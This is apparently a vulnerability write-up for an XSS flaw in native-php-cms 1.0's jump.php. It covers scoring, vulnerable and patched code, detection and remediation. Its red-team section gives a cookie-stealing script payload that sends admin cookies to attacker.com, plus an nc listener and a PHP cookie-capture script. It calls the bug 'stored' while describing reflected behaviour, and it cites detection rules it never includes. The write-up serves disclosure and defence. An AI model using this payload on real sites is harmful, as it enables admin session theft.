CVE-2025-0483
Executive Summary
CVE-2025-0483 is a Stored Cross-Site Scripting (XSS) vulnerability identified in the native-php-cms version 1.0, developed by Fanli2012. The flaw resides in the /fladmin/jump.php file, where the message and error parameters are not properly sanitized before being rendered. An attacker can inject arbitrary JavaScript code into these parameters, which will execute in the context of an administrator's browser when the jump page is loaded. This can lead to session hijacking, credential theft, or defacement of the admin panel. The vulnerability is remotely exploitable with low complexity, requires no authentication, but does require user interaction (the admin must visit the crafted URL). No official patch has been released, and a public proof-of-concept (PoC) is available.

CVSS Breakdown & Threat Level
- CVSS Score: 6.1 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Attack Vector (AV): Network (N) – Exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – No authentication needed.
- User Interaction (UI): Required (R) – The victim must click a crafted link.
- Scope (S): Changed (C) – The impact extends beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure.
- Integrity (I): Low (L) – Limited ability to modify content.
- Availability (A): None (N) – No impact on availability.
Threat Level: Medium. The vulnerability is easy to exploit but requires user interaction. However, in a CMS admin context, a single click can lead to full admin account compromise.
Deep Dive & Mechanics
The vulnerability exists in the /fladmin/jump.php file. This file is typically used to display a "jump" or redirect message after an admin action (e.g., "Operation successful, redirecting..."). The message and error GET parameters are directly embedded into the HTML response without any sanitization or encoding.
Vulnerable Code Snippet (Conceptual):
<?php
$message = $_GET['message'];
$error = $_GET['error'];
?>
<html>
<body>
<div id="message"><?php echo $message; ?></div>
<div id="error"><?php echo $error; ?></div>
</body>
</html>
An attacker can craft a URL like:
http://target.com/fladmin/jump.php?message=<script>alert('XSS')</script>
When an admin visits this URL, the JavaScript executes in the admin's session context. This can be escalated to steal cookies, perform actions on behalf of the admin, or inject persistent XSS payloads.
Vulnerable vs. Patched Code
Vulnerable Code (native-php-cms 1.0):
// fladmin/jump.php
$message = $_GET['message'];
$error = $_GET['error'];
echo "<div id='message'>$message</div>";
echo "<div id='error'>$error</div>";
Patched Code (Hypothetical):
// fladmin/jump.php
$message = htmlspecialchars($_GET['message'], ENT_QUOTES, 'UTF-8');
$error = htmlspecialchars($_GET['error'], ENT_QUOTES, 'UTF-8');
echo "<div id='message'>$message</div>";
echo "<div id='error'>$error</div>";
The fix uses htmlspecialchars() to encode HTML special characters, preventing script injection. Since no official patch exists, users must implement this manually.
Exploitation & Lab Setup
Red Team (Attacker)
Prerequisites:
- Target running native-php-cms 1.0.
- Admin user must be logged in.
Exploit Steps:
- Craft a malicious URL:
http://target.com/fladmin/jump.php?message=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> - Send the link to the admin via email, social engineering, or other means.
- When the admin clicks the link, the script executes and exfiltrates the session cookie to the attacker's server.
Lab Setup:
- Use a local Docker container or XAMPP to host the vulnerable CMS.
- Set up a listener on the attacker machine:
nc -lvnp 80 - Use a simple PHP script to capture cookies:
<?php $cookie = $_GET['cookie']; file_put_contents('cookies.txt', $cookie . "\n", FILE_APPEND); ?>
Blue Team (Defender)
Detection:
- Monitor web server logs for requests to
/fladmin/jump.phpcontaining<script>oronerrorpatterns. - Use WAF rules to block XSS payloads in GET parameters.
Mitigation:
- Apply input validation and output encoding as shown in the patched code.
- Restrict access to
/fladmin/directory via.htaccessor firewall rules. - Implement Content Security Policy (CSP) headers to block inline scripts.
Indicators of Compromise (IOCs)
- Network:
- HTTP GET requests to
/fladmin/jump.phpwith parameters containing<script>,onerror,onload, orjavascript:. - Outbound connections to unknown IPs on port 80/443 from the CMS server.
- HTTP GET requests to
- File:
- Suspicious entries in
cookies.txtor similar files on attacker-controlled servers.
- Suspicious entries in
- Log:
- Web server logs showing
jump.php?message=<script>patterns.
- Web server logs showing

Remediation & Mitigation
Immediate Action:
- Manually patch the
/fladmin/jump.phpfile by addinghtmlspecialchars()to all output of$_GET['message']and$_GET['error']. - Restrict access to the
/fladmin/directory using.htaccess:<Directory "/var/www/html/fladmin"> Require ip 192.168.1.0/24 </Directory>
- Manually patch the
Long-term Fix:
- Upgrade to a maintained CMS or apply the vendor's patch when released.
- Implement a Web Application Firewall (WAF) with XSS rules.
- Conduct a full security audit of the CMS codebase.
Detection:
- Deploy the provided YARA, Sigma, and Suricata rules.
- Monitor for anomalous admin behavior (e.g., unexpected redirects).
